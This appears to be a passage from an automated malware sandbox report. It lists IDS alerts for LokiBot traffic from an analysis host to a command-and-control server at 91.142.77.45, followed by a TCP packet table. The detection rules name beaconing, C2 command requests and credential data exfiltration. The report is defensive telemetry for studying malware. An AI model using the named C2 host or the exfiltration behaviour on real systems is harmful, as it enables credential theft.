192.168.2.691.142.77.4549716802021641 11/03/22-12:30:32.992651	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802024313 11/03/22-12:31:03.903902	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802021641 11/03/22-12:30:57.918358	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802024318 11/03/22-12:31:03.903902	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.855956532014169 11/03/22-12:31:47.481296	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55956	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549734802024313 11/03/22-12:31:25.377976	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802021641 11/03/22-12:30:42.564459	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802025381 11/03/22-12:30:53.367985	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802024313 11/03/22-12:31:31.046497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49737	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49740	91.142.77.45	192.168.2.6
192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59082	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	51530	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	60032	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49715	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49715	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49726	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58917	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49743	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49745	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49741	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237	TCP	2025381	ET TROJAN LokiBot Checkin	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49719	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63229	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49786	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56123	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49709	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49708	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49717	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49739	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65044	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49713	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49715	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56086	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49728	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49720	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49724	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49720	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	54903	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56547	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59504	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49727	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49736	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49738	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52556	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672	TCP	2025381	ET TROJAN LokiBot Checkin	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49730	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49725	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62520	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	57322	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49744	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49708	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49719	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49708	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49733	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49711	91.142.77.45	192.168.2.6
192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52079	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61833	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093	TCP	2025381	ET TROJAN LokiBot Checkin	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49711	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49722	91.142.77.45	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:30:06.648422003 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.705056906 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.767577887 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:09.767824888 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.785093069 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.847585917 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:09.847696066 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.911494017 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.378333092 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.378524065 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.378582001 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.441195965 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.912462950 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.974523067 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.974664927 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.977904081 CET	49707	80	192.168.2.6	91.142.77.45
